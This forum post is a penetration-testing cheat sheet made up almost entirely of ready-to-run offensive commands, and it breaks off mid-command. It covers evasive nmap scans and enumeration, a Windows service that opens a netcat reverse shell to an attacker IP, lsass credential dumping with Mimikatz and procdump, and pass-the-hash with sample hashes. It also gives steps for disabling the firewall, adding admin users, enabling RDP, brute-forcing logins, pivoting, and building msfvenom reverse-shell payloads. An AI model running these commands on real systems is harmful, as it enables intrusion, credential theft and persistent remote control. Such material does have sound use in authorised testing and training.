標題:滲透測試技巧大全

taibeihacker

Moderator

Nmap Full Web Vulnerable Scan​

cd /usr/share/nmap/scripts/
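# The archive is fetched over plain HTTP with no checksum given; inspect it before unpacking into nmap's script directory, because NSE scripts execute with nmap's privileges.
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
tar xzf nmap_nse_vulscan-2.0.tar.gz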
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan --script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all --script-args vulscancorrelation=1 target (all runs every NSE category, including intrusive, dos and exploit scripts that can disrupt the scanned service)

Dirb Dir Bruteforce:​

dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt

Nikto web server scanner​

nikto -C all -h http://ip

WordPress Scanner​

git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
./wpscan --url http://ip/ --enumerate p

HTTP Fingerprinting​

# Downloaded over plain HTTP; verify the archive before unpacking it and running the binary.
wget http://www.net-square.com/_assets/httprint_linux_301.zip
unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://ip -s signatures.txt

SKIP Fish Scanner​

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://ip

Nmap Ports Scan​

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
2)fargement
3)data packed – like orginal one not scan packet
4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
5)nmap –source-port 53 target
nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)

NC Scanning​

nc -v -w 1 target -z 1-1000
for i in {101.102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

Unicornscan​

us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
-H resolve hostnames during the reporting phase
-m scan mode (sf - tcp, U - udp)
-Iv - verbose

Xprobe2 OS fingerprinting​

xprobe2 -v -p tcp:80:open IP

Samba Enumeration​

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U '' target
enum4linux target

SNMP Enumeration​

snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

Windows Useful cmds​

net localgroup Users
net localgroup Administrators
search dir/s *.doc
system('start cmd.exe /k $cmd')
sc create microsoft_update binpath='cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe' start=auto error=ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe 'privilege:debug' 'log' 'sekurlsa:logonpasswords'
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe 'sekurlsa:minidump lsass.dmp' 'log' 'sekurlsa:logonpasswords'
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits

PuTTY Link tunnel​

Forward remote port to local address
plink.exe -P 22 -l root -pw '1234' -R 445:127.0.0.1:445 IP

Meterpreter portfwd​

# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
meterpreter portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali rdesktop 127.0.0.1:3389

Enable RDP Access​

reg add 'hklm\system\currentcontrolset\control\terminal server' /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Turn Off Windows Firewall​

netsh firewall set opmode disable

Meterpreter VNC\RDP​

# https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
run getgui -u admin -p 1234
run vnc -p 5043

Add New user in Windows​

net user test 1234 /add
net localgroup administrators test /add

Mimikatz use​

git clone https://github.com/gentilkiwi/mimikatz.git
privilege:debug
sekurlsa:logonPasswords full

Passing the Hash​

git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
or
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
or
meterpreter run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:
msf use exploit/windows/smb/psexec
msf exploit(psexec) set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) exploit
meterpreter shell

Hashcat password cracking​

hashcat -m 400 -a 0 hash /root/rockyou.txt

Netcat examples​

c: nc -l -p 31337
#nc 192.168.0.10 31337
c: nc -v -w 30 -p 31337 -l secret.txt
#nc -v -w 2 192.168.0.10 31337 secret.txt

Banner grabbing with NC​

nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referer: www.example.com
(press Enter twice: the blank line ends the request, and the Server header in the response is the banner)

Window reverse shell​

c:nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:nc example.com 80 -e cmd.exe
nc -lp 80
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

Find SUID\SGID root files​

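# Filesystem audit for privileged and orphaned files. Each command walks the
# whole tree from /, so expect permission-denied noise when not run as root.

# Find SUID files owned by root
find / -user root -perm -4000 -print
# Find SGID files whose group is root
find / -group root -perm -2000 -print
# Find SUID or SGID files owned by anyone. The parentheses are required:
# without them -print binds only to the -perm -2000 test, so files that
# have the SUID bit set are matched but never listed.
find / \( -perm -4000 -o -perm -2000 \) -print
# Find files whose owner UID has no matching user account
find / -nouser -print
# Find files whose GID has no matching group
find / -nogroup -print
# Find symlinks and show what they point to
find / -type l -ls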

Python shell​

python -c 'import pty;pty.spawn('/bin/bash')'

Python\Ruby\PHP HTTP Server​

python2 -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start'
php -S 0.0.0.0:8888

Get PIDs of process​

fuser -nv tcp 80
fuser -k -n tcp 80

Hydra rdp Bruteforce​

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp

Mount Remote Windows Share​

smbmount //X.X.X.X/c$ /mnt/remote/-o username=user,password=pass,rw

Compiling Exploit in Kali​

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Compiling Windows Exploits on Kali​

wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
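# Prebuilt binaries from a third-party site over plain HTTP: check what the archive contains before unpacking it into the Wine Windows directory.
wget http://gojhonny.com/misc/mingw_bin.zip
unzip mingw_bin.zip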
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

NASM Commands​

nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Pivoting​

ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target

SSH Pivoting from One Network to Another​

ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target

Pivoting Using metasploit​

route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
or
# https://www.offensive-security.com/metasploit-unleashed/pivoting/
meterpreter ipconfig
IP Address : 10.1.13.3
meterpreter run autoroute -s 10.1.13.0/24
meterpreter run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter Ctrl+Z
msf auxiliary(tcp) use exploit/windows/smb/psexec
msf exploit(psexec) set RHOST 10.1.13.2
msf exploit(psexec) exploit
meterpreter ipconfig
IP Address : 10.1.13.2

Exploit-DB search using CSV File​

git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit –u
./searchsploit apache 2.2
./searchsploit 'Linux Kernel'
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep '|=' | sort -k3

MSF Payloads​

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address X system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 R exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 -e x86/shikata_ga_nai -b '\x00' -a x86 --platform win -f c

MSF Linux Reverse Meterpreter Binary​

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 -e -f elf -a x86 --platform linux -o shell

MSF Reverse Shell (C Shellcode)​

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b '\x00\x0a\x0d' -a x86 --platform win -f c

MSF Reverse Shell Python Script​

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

MSF Reverse ASP Shell​

msfvenom -p windows/meterpreter/reverse_tcp LHOST=Your IP Address LPORT=Your Port to Connect On -f asp -a x86 --platform win -o shell.asp

MSF Reverse Bash Shell​

msfvenom -p cmd/unix/reverse_bash LHOST=Your IP Address LPORT=Your Port to Conn
 